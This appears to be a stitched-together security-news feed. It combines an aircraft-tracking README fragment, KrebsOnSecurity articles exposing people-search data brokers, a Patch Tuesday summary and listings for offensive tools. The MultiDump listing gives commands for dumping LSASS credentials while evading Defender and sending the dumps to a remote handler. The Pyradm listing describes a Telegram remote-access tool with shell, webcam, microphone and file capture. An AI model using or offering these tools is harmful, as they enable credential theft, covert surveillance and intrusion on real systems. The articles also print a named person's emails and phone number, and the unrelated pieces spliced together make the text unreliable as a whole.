    skytrack also enables you to save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be titled "skytrack_report.pdf".

    Tail Number to ICAO Converter

    There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumeric ID starting with the letter "N" used to identify aircraft. The ICAO designation (ICAO24 address) is a six-character fixed-length ID in hexadecimal format. Both standards are highly pertinent for aircraft reconnaissance, as both can be used to search for a specific aircraft in data sources. However, converting from one format to the other can be rather cumbersome, as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

    Further Explanation

    ICAO and Tail Numbers follow a mapping system like the following:

    ICAO address | N-Number (Tail Number)
    a00001 | N1
    a00002 | N1A
    a00003 | N1AA

    You can learn more about aircraft registration numbers here: https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers

    ⚠️ The converter only works for USA-registered aircraft.
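
    To make the mapping above concrete, here is a tiny, illustrative Python lookup built only from the three sample pairs shown; the full sequential algorithm that skytrack implements covers the entire US registry range and is considerably more involved.

    # Illustrative only: the three sample pairs from the table above.
    ICAO_TO_TAIL = {
        "a00001": "N1",
        "a00002": "N1A",
        "a00003": "N1AA",
    }
    TAIL_TO_ICAO = {tail: icao for icao, tail in ICAO_TO_TAIL.items()}

    def lookup(value: str) -> str:
        """Convert between the sample ICAO addresses and N-Numbers (both directions)."""
        value = value.strip()
        return ICAO_TO_TAIL.get(value.lower()) or TAIL_TO_ICAO.get(value.upper()) or "unknown"

    print(lookup("a00002"))  # -> N1A
    print(lookup("N1AA"))    # -> a00003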

    Data Sources & APIs Used

    ICAO Aircraft Type Designators Listings

    FlightAware

    Wikipedia

    Aviation Safety Website

    Jet Photos Website

    OpenSky API

    Aviation Weather METAR

    Airport Codes Dataset

    Contributing

    skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

    Upcoming

    • Obtain Latest Flown Airports
    • Obtain Airport Information
    • Obtain ATC Frequency Information

    Support

    If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

    To check out my other works, visit my GitHub profile.



    The Not-so-True People-Search Network from China

    It’s not unusual for the data brokers behind people-search websites to use pseudonyms in their day-to-day lives (you would, too). Some of these personal data purveyors even try to reinvent their online identities in a bid to hide their conflicts of interest. But it’s not every day you run across a US-focused people-search network based in China whose principal owners all appear to be completely fabricated identities.

    Responding to a reader inquiry concerning the trustworthiness of a site called TruePeopleSearch[.]net, KrebsOnSecurity began poking around. The site offers to sell reports containing photos, police records, background checks, civil judgments, contact information “and much more!” According to LinkedIn and numerous profiles on websites that accept paid article submissions, the founder of TruePeopleSearch is Marilyn Gaskell from Phoenix, Ariz.

    The saucy yet studious LinkedIn profile for Marilyn Gaskell.

    Ms. Gaskell has been quoted in multiple “articles” about random subjects, such as this article at HRDailyAdvisor about the pros and cons of joining a company-led fantasy football team.

    “Marilyn Gaskell, founder of TruePeopleSearch, agrees that not everyone in the office is likely to be a football fan and might feel intimidated by joining a company league or left out if they don’t join; however, her company looked for ways to make the activity more inclusive,” this paid story notes.

    Also quoted in this article is Sally Stevens, who is cited as HR Manager at FastPeopleSearch[.]io.

    Sally Stevens, the phantom HR Manager for FastPeopleSearch.

    “Fantasy football provides one way for employees to set aside work matters for some time and have fun,” Stevens contributed. “Employees can set a special league for themselves and regularly check and compare their scores against one another.”

    Imagine that: Two different people-search companies mentioned in the same story about fantasy football. What are the odds?

    Both TruePeopleSearch and FastPeopleSearch allow users to search for reports by first and last name, but proceeding to order a report prompts the visitor to purchase the file from one of several established people-finder services, including BeenVerified, Intelius, and Spokeo.

    DomainTools.com shows that both TruePeopleSearch and FastPeopleSearch appeared around 2020 and were registered through Alibaba Cloud, in Beijing, China. No other information is available about these domains in their registration records, although both domains appear to use email servers based in China.

    Sally Stevens’ LinkedIn profile photo is identical to a stock image titled “beautiful girl” from Adobe.com. Ms. Stevens is also quoted in a paid blog post at ecogreenequipment.com, as is Alina Clark, co-founder and marketing director of CocoDoc, an online service for editing and managing PDF documents.

    The profile photo for Alina Clark is a stock photo appearing on more than 100 websites.

    Scouring multiple image search sites reveals Ms. Clark’s profile photo on LinkedIn is another stock image that is currently on more than 100 different websites, including Adobe.com. Cocodoc[.]com was registered in June 2020 via Alibaba Cloud Beijing in China.

    The same Alina Clark and photo materialized in a paid article at the website Ceoblognation, which in 2021 included her at #11 in a piece called “30 Entrepreneurs Describe The Big Hairy Audacious Goals (BHAGs) for Their Business.” It’s also worth noting that Ms. Clark is currently listed as a “former Forbes Council member” at the media outlet Forbes.com.

    Entrepreneur #6 is Stephen Curry, who is quoted as CEO of CocoSign[.]com, a website that claims to offer an “easier, quicker, safer eSignature solution for small and medium-sized businesses.” Incidentally, the same photo for Stephen Curry #6 is also used in this “article” for #22 Jake Smith, who is named as the owner of a different company.

    Stephen Curry, aka Jake Smith, aka no such person.

    Mr. Curry’s LinkedIn profile shows a young man seated at a table in front of a laptop, but an online image search shows this is another stock photo. Cocosign[.]com was registered in June 2020 via Alibaba Cloud Beijing. No ownership details are available in the domain registration records.

    Listed at #13 in that 30 Entrepreneurs article is Eden Cheng, who is cited as co-founder of PeopleFinderFree[.]com. KrebsOnSecurity could not find a LinkedIn profile for Ms. Cheng, but a search on her profile image from that Entrepreneurs article shows the same photo for sale at Shutterstock and other stock photo sites.

    DomainTools says PeopleFinderFree was registered through Alibaba Cloud, Beijing. Attempts to purchase reports through PeopleFinderFree produce a notice saying the full report is only available via Spokeo.com.

    Lynda Fairly is Entrepreneur #24, and she is quoted as co-founder of Numlooker[.]com, a domain registered in April 2021 through Alibaba in China. Searches for people on Numlooker forward visitors to Spokeo.

    The photo next to Ms. Fairly’s quote in Entrepreneurs matches that of a LinkedIn profile for Lynda Fairly. But a search on that photo shows this same portrait has been used by many other identities and names, including a woman from the United Kingdom who’s a cancer survivor and mother of five; a licensed marriage and family therapist in Canada; a software security engineer at Quora; a journalist on Twitter/X; and a marketing expert in Canada.

    Cocofinder[.]com is a people-search service that launched in Sept. 2019, through Alibaba in China. Cocofinder lists its market officer as Harriet Chan, but Ms. Chan’s LinkedIn profile is just as sparse on work history as the other people-search owners mentioned already. An image search online shows that outside of LinkedIn, the profile photo for Ms. Chan has only ever appeared in articles at pay-to-play media sites, like this one from outbackteambuilding.com.

    Perhaps because Cocodoc and Cocosign both sell software services, they are actually tied to a physical presence in the real world — in Singapore (15 Scotts Rd. #03-12 15, Singapore). But it’s difficult to discern much from this address alone.

    Who’s behind all this people-search chicanery? A January 2024 review of various people-search services at the website techjury.com states that Cocofinder is a wholly-owned subsidiary of a Chinese company called Shenzhen Duiyun Technology Co.

    “Though it only finds results from the United States, users can choose between four main search methods,” Techjury explains. Those include people search, phone, address and email lookup. This claim is supported by a Reddit post from three years ago, wherein the Reddit user “ProtectionAdvanced” named the same Chinese company.

    Is Shenzhen Duiyun Technology Co. responsible for all these phony profiles? How many more fake companies and profiles are connected to this scheme? KrebsOnSecurity found other examples that didn’t appear directly tied to other fake executives listed here, but which nevertheless are registered through Alibaba and seek to drive traffic to Spokeo and other data brokers. For example, there’s the winsome Daniela Sawyer, founder of FindPeopleFast[.]net, whose profile is flogged in paid stories at entrepreneur.org.

    Google currently turns up nothing else in a search for Shenzhen Duiyun Technology Co. Please feel free to sound off in the comments if you have any more information about this entity, such as how to contact it. Or reach out directly at krebsonsecurity @ gmail.com.

    A mind map highlighting the key points of research in this story. Click to enlarge. Image: KrebsOnSecurity.com

    ANALYSIS

    It appears the purpose of this network is to conceal the location of people in China who are seeking to generate affiliate commissions when someone visits one of their sites and purchases a people-search report at Spokeo, for example. And it is clear that Spokeo and others have created incentives wherein anyone can effectively white-label their reports, and thereby make money brokering access to peoples’ personal information.

    Spokeo’s Wikipedia page says the company was founded in 2006 by four graduates from Stanford University. Spokeo co-founder and current CEO Harrison Tang has not yet responded to requests for comment.

    Intelius is owned by San Diego based PeopleConnect Inc., which also owns Classmates.com, USSearch, TruthFinder and Instant Checkmate. PeopleConnect Inc. in turn is owned by H.I.G. Capital, a $60 billion private equity firm. Requests for comment were sent to H.I.G. Capital. This story will be updated if they respond.

    BeenVerified is owned by a New York City based holding company called The Lifetime Value Co., a marketing and advertising firm whose brands include PeopleLooker, NeighborWho, Ownerly, PeopleSmart, NumberGuru, and Bumper, a car history site.

    Ross Cohen, chief operating officer at The Lifetime Value Co., said it’s likely the network of suspicious people-finder sites was set up by an affiliate. Cohen said Lifetime Value would investigate to determine if this particular affiliate was driving them any sign-ups.

    All of the above people-search services operate similarly. When you find the person you’re looking for, you are put through a lengthy (often 10-20 minute) series of splash screens that require you to agree that these reports won’t be used for employment screening or in evaluating new tenant applications. Still more prompts ask if you are okay with seeing “potentially shocking” details about the subject of the report, including arrest histories and photos.

    Only at the end of this process does the site disclose that viewing the report in question requires signing up for a monthly subscription, which is typically priced around $35. Exactly how and from where these major people-search websites are getting their consumer data — and customers — will be the subject of further reporting here.

    The main reason these various people-search sites require you to affirm that you won’t use their reports for hiring or vetting potential tenants is that selling reports for those purposes would classify these firms as consumer reporting agencies (CRAs) and expose them to regulations under the Fair Credit Reporting Act (FCRA).

    These data brokers do not want to be treated as CRAs, and for this reason their people search reports typically don’t include detailed credit histories, financial information, or full Social Security Numbers (Radaris reports include the first six digits of one’s SSN).

    But in September 2023, the U.S. Federal Trade Commission found that TruthFinder and Instant Checkmate were trying to have it both ways. The FTC levied a $5.8 million penalty against the companies for allegedly acting as CRAs because they assembled and compiled information on consumers into background reports that were marketed and sold for employment and tenant screening purposes.

    The FTC also found TruthFinder and Instant Checkmate deceived users about background report accuracy. The FTC alleges these companies made millions from their monthly subscriptions using push notifications and marketing emails that claimed that the subject of a background report had a criminal or arrest record, when the record was merely a traffic ticket.

    The FTC said both companies deceived customers by providing “Remove” and “Flag as Inaccurate” buttons that did not work as advertised. Rather, the “Remove” button removed the disputed information only from the report as displayed to that customer; however, the same item of information remained visible to other customers who searched for the same person.

    The FTC also said that when a customer flagged an item in the background report as inaccurate, the companies never took any steps to investigate those claims, to modify the reports, or to flag to other customers that the information had been disputed.

    There are a growing number of online reputation management companies that offer to help customers remove their personal information from people-search sites and data broker databases. There are, no doubt, plenty of honest and well-meaning companies operating in this space, but it has been my experience that a great many people involved in that industry have a background in marketing or advertising — not privacy.

    Also, some so-called data privacy companies may be wolves in sheep’s clothing. On March 14, KrebsOnSecurity published an abundance of evidence indicating that the CEO and founder of the data privacy company OneRep.com was responsible for launching dozens of people-search services over the years.

    Finally, some of the more popular people-search websites are notorious for ignoring requests from consumers seeking to remove their information, regardless of which reputation or removal service you use. Some force you to create an account and provide more information before you can remove your data. Even then, the information you worked hard to remove may simply reappear a few months later.

    This aptly describes countless complaints lodged against the data broker and people search giant Radaris. On March 8, KrebsOnSecurity profiled the co-founders of Radaris, two Russian brothers in Massachusetts who also operate multiple Russian-language dating services and affiliate programs.

    The truth is that these people-search companies will continue to thrive unless and until Congress begins to realize it’s time for some consumer privacy and data protection laws that are relevant to life in the 21st century. Duke University adjunct professor Justin Sherman says virtually all state privacy laws exempt records that might be considered “public” or “government” documents, including voting registries, property filings, marriage certificates, motor vehicle records, criminal records, court documents, death records, professional licenses, bankruptcy filings, and more.

    “Consumer privacy laws in California, Colorado, Connecticut, Delaware, Indiana, Iowa, Montana, Oregon, Tennessee, Texas, Utah, and Virginia all contain highly similar or completely identical carve-outs for ‘publicly available information’ or government records,” Sherman said.

    MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly

    By: Zion3R


    MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

    Blog post: https://xre0us.io/posts/multidump


    MultiDump supports dumping LSASS via ProcDump.exe or comsvcs.dll. It offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.

    Usage

    Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

    -p Path to save procdump.exe, use full path. Defaults to the temp directory
    -l Path to save the encrypted dump file, use full path. Defaults to the current directory
    -r Set ip:port to connect to a remote handler
    --procdump Write procdump.exe to disk and use it to dump LSASS
    --nodump Disable LSASS dumping
    --reg Dump the SAM, SECURITY and SYSTEM hives
    --delay Increase the interval between connections, for slower network speeds
    -v Enable verbose mode

    MultiDump defaults to local mode, using comsvcs.dll, and saves the encrypted dump in the current directory.
    Examples:
    MultiDump.exe -l C:\Users\Public\lsass.dmp -v
    MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
    usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

    Handler for RemoteProcDump

    options:
    -h, --help show this help message and exit
    -r REMOTE, --remote REMOTE
    Port to receive remote dump file
    -l LOCAL, --local LOCAL
    Local dump file, key needed to decrypt
    --sam SAM Local SAM save, key needed to decrypt
    --security SECURITY Local SECURITY save, key needed to decrypt
    --system SYSTEM Local SYSTEM save, key needed to decrypt
    -k KEY, --key KEY Key to decrypt local file
    --override-ip OVERRIDE_IP
    Manually specify the IP address for key generation in remote mode, for proxied connection

    As with all LSASS-related tools, Administrator/SeDebugPrivilege privileges are required.

    The handler depends on Pypykatz to parse the LSASS dump and on impacket to parse the registry saves; both should be installed in your environment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.

    By default, MultiDump uses the comsvcs.dll method and saves the encrypted dump in the current directory.

    MultiDump.exe
    ...
    [i] Local Mode Selected. Writing Encrypted Dump File to Disk...
    [i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
    [i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
    ./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

    If --procdump is used, ProcDump.exe will be written to disk to dump LSASS.

    In remote mode, MultiDump connects to the handler's listener.

    ./ProcDumpHandler.py -r 9001
    [i] Listening on port 9001 for encrypted key...
    MultiDump.exe -r 10.0.0.1:9001

    The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.
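
    As a rough illustration of how a key can be bound to the handler address (the exact hashing and cipher MultiDump uses are not documented here, so the derivation below is an assumption for illustration only), consider this Python sketch:

    import hashlib

    def derive_key(handler_ip: str, handler_port: int) -> bytes:
        # Hypothetical derivation: hash the "ip:port" string the client believes it is
        # connecting to. If the client goes through a proxy, the two sides would hash
        # different addresses, which is why an --override-ip style option is needed so
        # the handler can hash the address that was actually passed to MultiDump -r.
        return hashlib.sha512(f"{handler_ip}:{handler_port}".encode()).digest()

    # Both ends must agree on the same address for the derived keys to match.
    assert derive_key("10.0.0.1", 9001) == derive_key("10.0.0.1", 9001)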

    An additional option to dump the SAM, SECURITY and SYSTEM hives is available with --reg; the decryption process is the same as for LSASS dumps. This is more of a convenience feature to make post-exploitation information gathering easier.

    Building MultiDump

    Open in Visual Studio, build in Release mode.

    Customising MultiDump

    It is recommended to customise the binary before compiling, for example by changing the static strings or the RC4 key used to encrypt them. To do so, a second Visual Studio project, EncryptionHelper, is included: simply change the key or strings, and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.

    Self deletion can be toggled by uncommenting the following line in Common.h:

    #define SELF_DELETION

    To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

    //#define DEBUG

    MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of). The investigation and implementation deserve a blog post of their own: https://xre0us.io/posts/saving-lsass-from-defender/

    Credits



    Dorkish - Chrome Extension Tool For OSINT & Recon

    By: Zion3R


    During the reconnaissance phase or when doing OSINT, we often rely on Google dorking and Shodan, and that is the idea behind Dorkish.
    Dorkish is a Chrome extension that facilitates custom dork creation for Google and Shodan using a builder, and it offers prebuilt dorks for efficient reconnaissance and OSINT engagements.


    Installation And Setup

    1- Clone the repository

    git clone https://github.com/yousseflahouifi/dorkish.git

    2- Go to chrome://extensions/ and enable Developer mode in the top right corner.
    3- Click the Load unpacked button and select the dorkish folder.

    Note: For Firefox users, the extension is available here: https://addons.mozilla.org/en-US/firefox/addon/dorkish/

    Features

    Google dorking

    • Builder with keywords to filter your Google search results.
    • Prebuilt dorks for bug bounty programs.
    • Prebuilt dorks used during the reconnaissance phase in bug bounty.
    • Prebuilt dorks for exposed files and directories.
    • Prebuilt dorks for login and sign-up portals.
    • Prebuilt dorks for cyber security jobs.

    Shodan dorking

    • Builder with filter keywords used in Shodan.
    • Variety of prebuilt dorks to find IoT devices, network infrastructure, cameras, ICS, databases, etc.

    Usage

    Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.
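
    Under the hood, a dork builder mostly concatenates operator:value pairs and URL-encodes them into a search link. A minimal Python sketch of the idea (the operators are ordinary Google/Shodan search syntax; the function names and defaults below are illustrative, not Dorkish's actual code):

    from urllib.parse import quote_plus

    def build_google_dork(site: str, filetype: str = None, intitle: str = None) -> str:
        # Assemble operator:value pairs into a single query string.
        parts = [f"site:{site}"]
        if filetype:
            parts.append(f"filetype:{filetype}")
        if intitle:
            parts.append(f'intitle:"{intitle}"')
        return "https://www.google.com/search?q=" + quote_plus(" ".join(parts))

    def build_shodan_dork(product: str, country: str = None) -> str:
        parts = [f'product:"{product}"']
        if country:
            parts.append(f"country:{country}")
        return "https://www.shodan.io/search?query=" + quote_plus(" ".join(parts))

    print(build_google_dork("example.com", filetype="pdf", intitle="index of"))
    print(build_shodan_dork("nginx", country="US"))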

    TODO

    • Add more useful dorks and categories
    • Fix some bugs
    • Add a search bar to search through the results
    • Might add some LLM models to build dorks

    Notes

    I have built some dorks myself and used some public resources to gather others; here are a few: - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty

    Warning

    • I am not responsible for any damage caused by using the tool


    Pyradm - Python Remote Administration Tool Via Telegram

    By: Zion3R


    Cross-platform remote administration tool via Telegram. Coded with ❤️ in Python 3 + aiogram 3. https://t.me/pt_soft

    v0.3

    • [X] Screenshot from target
    • [X] Cross-platform
    • [X] Upload/Download
    • [X] Fully compatible shell
    • [X] Process list
    • [X] Webcam (video record or screenshot)
    • [X] Geolocation
    • [X] Filemanager
    • [X] Microphone
    • [X] Clipboard (text, image)

    Functional

    /start - start pyradm
    /help - help
    /shell - shell commands
    /sc - screenshot
    /download - download (abs. path)
    /info - system info
    /ip - public ip address and geolocation
    /ps - process list
    /webcam 5 - record video (secs)
    /webcam - screenshot from camera
    /fm - filemanager
    /fm /home or /fm C:\
    /mic 10 - record audio from mic
    /clip - get clipboard data
    Press button to download file
    Send any file as file for upload to target

    Install

    • git clone https://github.com/akhomlyuk/pyradm.git
    • cd pyradm
    • pip3 install -r requirements.txt
    • Put the bot token in cfg.py (ask @BotFather)
    • python3 main.py

    Compile

    • Put the bot token in cfg.py
    • pip install nuitka
    • nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py

    Screens



    CEO of Data Privacy Company Onerep.com Founded Dozens of People-Search Firms

    The data privacy company Onerep.com bills itself as a Virginia-based service for helping people remove their personal information from almost 200 people-search websites. However, an investigation into the history of onerep.com finds this company is operating out of Belarus and Cyprus, and that its founder has launched dozens of people-search services over the years.

    Onerep’s “Protect” service starts at $8.33 per month for individuals and $15/mo for families, and promises to remove your personal information from nearly 200 people-search sites. Onerep also markets its service to companies seeking to offer their employees the ability to have their data continuously removed from people-search sites.

    A testimonial on onerep.com.

    Customer case studies published on onerep.com state that it struck a deal to offer the service to employees of Permanente Medicine, which represents the doctors within the health insurance giant Kaiser Permanente. Onerep also says it has made inroads among police departments in the United States.

    But a review of Onerep’s domain registration records and that of its founder reveal a different side to this company. Onerep.com says its founder and CEO is Dimitri Shelest from Minsk, Belarus, as does Shelest’s profile on LinkedIn. Historic registration records indexed by DomainTools.com say Mr. Shelest was a registrant of onerep.com who used the email address dmitrcox2@gmail.com.

    A search in the data breach tracking service Constella Intelligence for the name Dimitri Shelest brings up the email address dimitri.shelest@onerep.com. Constella also finds that Dimitri Shelest from Belarus used the email address d.sh@nuwber.com, and the Belarus phone number +375-292-702786.

    Nuwber.com is a people search service whose employees all appear to be from Belarus, and it is one of dozens of people-search companies that Onerep claims to target with its data-removal service. Onerep.com’s website disavows any relationship to Nuwber.com, stating quite clearly, “Please note that OneRep is not associated with Nuwber.com.”

    However, there is an abundance of evidence suggesting Mr. Shelest is in fact the founder of Nuwber. Constella found that Minsk telephone number (375-292-702786) has been used multiple times in connection with the email address dmitrcox@gmail.com. Recall that Onerep.com’s domain registration records in 2018 list the email address dmitrcox2@gmail.com.

    It appears Mr. Shelest sought to reinvent his online identity in 2015 by adding a “2” to his email address. The Belarus phone number tied to Nuwber.com shows up in the domain records for comversus.com, and DomainTools says this domain is tied to both dmitrcox@gmail.com and dmitrcox2@gmail.com. Other domains that mention both email addresses in their WHOIS records include careon.me, docvsdoc.com, dotcomsvdot.com, namevname.com, okanyway.com and tapanyapp.com.

    Onerep.com CEO and founder Dimitri Shelest, as pictured on the “about” page of onerep.com.

    A search in DomainTools for the email address dmitrcox@gmail.com shows it is associated with the registration of at least 179 domain names, including dozens of mostly now-defunct people-search companies targeting citizens of Argentina, Brazil, Canada, Denmark, France, Germany, Hong Kong, Israel, Italy, Japan, Latvia and Mexico, among others.

    Those include nuwber.fr, a site registered in 2016 which was identical to the homepage of Nuwber.com at the time. DomainTools shows the same email and Belarus phone number are in historic registration records for nuwber.at, nuwber.ch, and nuwber.dk (all domains linked here are to their cached copies at archive.org, where available).

    Nuwber.com, circa 2015. Image: Archive.org.

    Update, March 21, 11:15 a.m. ET: Mr. Shelest has provided a lengthy response to the findings in this story. In summary, Shelest acknowledged maintaining an ownership stake in Nuwber, but said there was “zero cross-over or information-sharing with OneRep.” Mr. Shelest said any other old domains that may be found and associated with his name are no longer being operated by him.

    “I get it,” Shelest wrote. “My affiliation with a people search business may look odd from the outside. In truth, if I hadn’t taken that initial path with a deep dive into how people search sites work, Onerep wouldn’t have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I’m aiming to do better in the future.” The full statement is available here (PDF).

    Original story:

    Historic WHOIS records for onerep.com show it was registered for many years to a resident of Sioux Falls, SD for a completely unrelated site. But around Sept. 2015 the domain switched from the registrar GoDaddy.com to eNom, and the registration records were hidden behind privacy protection services. DomainTools indicates around this time onerep.com started using domain name servers from DNS provider constellix.com. Likewise, Nuwber.com first appeared in late 2015, was also registered through eNom, and also started using constellix.com for DNS at nearly the same time.

    Listed on LinkedIn as a former product manager at OneRep.com between 2015 and 2018 is Dimitri Bukuyazau, who says their hometown is Warsaw, Poland. While this LinkedIn profile (linkedin.com/in/dzmitrybukuyazau) does not mention Nuwber, a search on this name in Google turns up a 2017 blog post from privacyduck.com, which laid out a number of reasons to support a conclusion that OneRep and Nuwber.com were the same company.

    “Any people search profiles containing your Personally Identifiable Information that were on Nuwber.com were also mirrored identically on OneRep.com, down to the relatives’ names and address histories,” Privacyduck.com wrote. The post continued:

    “Both sites offered the same immediate opt-out process. Both sites had the same generic contact and support structure. They were – and remain – the same company (even PissedConsumer.com advocates this fact: https://nuwber.pissedconsumer.com/nuwber-and-onerep-20160707878520.html).”

    “Things changed in early 2016 when OneRep.com began offering privacy removal services right alongside their own open displays of your personal information. At this point when you found yourself on Nuwber.com OR OneRep.com, you would be provided with the option of opting-out your data on their site for free – but also be highly encouraged to pay them to remove it from a slew of other sites (and part of that payment was removing you from their own site, Nuwber.com, as a benefit of their service).”

    Reached via LinkedIn, Mr. Bukuyazau declined to answer questions, such as whether he ever worked at Nuwber.com. However, Constella Intelligence finds two interesting email addresses for employees at nuwber.com: d.bu@nuwber.com, and d.bu+figure-eight.com@nuwber.com, which was registered under the name “Dzmitry.”

    PrivacyDuck’s claims about how onerep.com appeared and behaved in the early days are not readily verifiable because the domain onerep.com has been completely excluded from the Wayback Machine at archive.org. The Wayback Machine will honor such requests if they come directly from the owner of the domain in question.

    Still, Mr. Shelest’s name, phone number and email also appear in the domain registration records for a truly dizzying number of country-specific people-search services, including pplcrwlr.in, pplcrwlr.fr, pplcrwlr.dk, pplcrwlr.jp, peeepl.br.com, peeepl.in, peeepl.it and peeepl.co.uk.

    The same details appear in the WHOIS registration records for the now-defunct people-search sites waatpp.de, waatp1.fr, azersab.com, and ahavoila.com, a people-search service for French citizens.

    The German people-search site waatp.de.

    A search on the email address dmitrcox@gmail.com suggests Mr. Shelest was previously involved in rather aggressive email marketing campaigns. In 2010, an anonymous source leaked to KrebsOnSecurity the financial and organizational records of Spamit, which at the time was easily the largest Russian-language pharmacy spam affiliate program in the world.

    Spamit paid spammers a hefty commission every time someone bought male enhancement drugs from any of their spam-advertised websites. Mr. Shelest’s email address stood out because immediately after the Spamit database was leaked, KrebsOnSecurity searched all of the Spamit affiliate email addresses to determine if any of them corresponded to social media accounts at Facebook.com (at the time, Facebook allowed users to search profiles by email address).

    That mapping, which was done mainly by generous graduate students at my alma mater George Mason University, revealed that dmitrcox@gmail.com was used by a Spamit affiliate, albeit not a very profitable one. That same Facebook profile for Mr. Shelest is still active, and it says he is married and living in Minsk [Update, Mar. 16: Mr. Shelest’s Facebook account is no longer active].

    The Italian people-search website peeepl.it.

    Scrolling down Mr. Shelest’s Facebook page to posts made more than ten years ago show him liking the Facebook profile pages for a large number of other people-search sites, including findita.com, findmedo.com, folkscan.com, huntize.com, ifindy.com, jupery.com, look2man.com, lookerun.com, manyp.com, peepull.com, perserch.com, persuer.com, pervent.com, piplenter.com, piplfind.com, piplscan.com, popopke.com, pplsorce.com, qimeo.com, scoutu2.com, search64.com, searchay.com, seekmi.com, selfabc.com, socsee.com, srching.com, toolooks.com, upearch.com, webmeek.com, and many country-code variations of viadin.ca (e.g. viadin.hk, viadin.com and viadin.de).

    The people-search website popopke.com.

    Domaintools.com finds that all of the domains mentioned in the last paragraph were registered to the email address dmitrcox@gmail.com.

    Mr. Shelest has not responded to multiple requests for comment. KrebsOnSecurity also sought comment from onerep.com, which likewise has not responded to inquiries about its founder’s many apparent conflicts of interest. In any event, these practices would seem to contradict the goal Onerep has stated on its site: “We believe that no one should compromise personal online security and get a profit from it.”

    The people-search website findmedo.com.

    Max Anderson is chief growth officer at 360 Privacy, a legitimate privacy company that works to keep its clients’ data off of more than 400 data broker and people-search sites. Anderson said it is concerning to see a direct link between a data removal service and data broker websites.

    “I would consider it unethical to run a company that sells people’s information, and then charge those same people to have their information removed,” Anderson said.

    Last week, KrebsOnSecurity published an analysis of the people-search data broker giant Radaris, whose consumer profiles are deep enough to rival those of far more guarded data broker resources available to U.S. police departments and other law enforcement personnel.

    That story revealed that the co-founders of Radaris are two native Russian brothers who operate multiple Russian-language dating services and affiliate programs. It also appears many of the Radaris founders’ businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.

    KrebsOnSecurity will continue investigating the history of various consumer data brokers and people-search providers. If any readers have inside knowledge of this industry or key players within it, please consider reaching out to krebsonsecurity at gmail.com.

    Update, March 15, 11:35 a.m. ET: Many readers have pointed out something that was somehow overlooked amid all this research: The Mozilla Foundation, the company that runs the Firefox Web browser, has launched a data removal service called Mozilla Monitor that bundles OneRep. That notice says Mozilla Monitor is offered as a free or paid subscription service.

    “The free data breach notification service is a partnership with Have I Been Pwned (“HIBP”),” the Mozilla Foundation explains. “The automated data deletion service is a partnership with OneRep to remove personal information published on publicly available online directories and other aggregators of information about individuals (“Data Broker Sites”).”

    In a statement shared with KrebsOnSecurity.com, Mozilla said they did assess OneRep’s data removal service to confirm it acts according to privacy principles advocated at Mozilla.

    “We were aware of the past affiliations with the entities named in the article and were assured they had ended prior to our work together,” the statement reads. “We’re now looking into this further. We will always put the privacy and security of our customers first and will provide updates as needed.”

    Patch Tuesday, March 2024 Edition

    Apple and Microsoft recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its Windows OS. Meanwhile, Apple’s new macOS Sonoma addresses at least 68 security weaknesses, and its latest update for iOS fixes two zero-day flaws.

    Last week, Apple pushed out an urgent software update to its flagship iOS platform, warning that there were at least two zero-day exploits for vulnerabilities being used in the wild (CVE-2024-23225 and CVE-2024-23296). The security updates are available in iOS 17.4, iPadOS 17.4, and iOS 16.7.6.

    Apple’s macOS Sonoma 14.4 Security Update addresses dozens of security issues. Jason Kitka, chief information security officer at Automox, said the vulnerabilities patched in this update often stem from memory safety issues, a concern that has led to a broader industry conversation about the adoption of memory-safe programming languages [full disclosure: Automox is an advertiser on this site].

    On Feb. 26, 2024, the Biden administration issued a report that calls for greater adoption of memory-safe programming languages. On Mar. 4, 2024, Google published Secure by Design, which lays out the company’s perspective on memory safety risks.

    Mercifully, there do not appear to be any zero-day threats hounding Windows users this month (at least not yet). Satnam Narang, senior staff research engineer at Tenable, notes that of the 60 CVEs in this month’s Patch Tuesday release, only six are considered “more likely to be exploited” according to Microsoft.

    Those more likely to be exploited bugs are mostly “elevation of privilege vulnerabilities” including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System (CimFS)), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler).

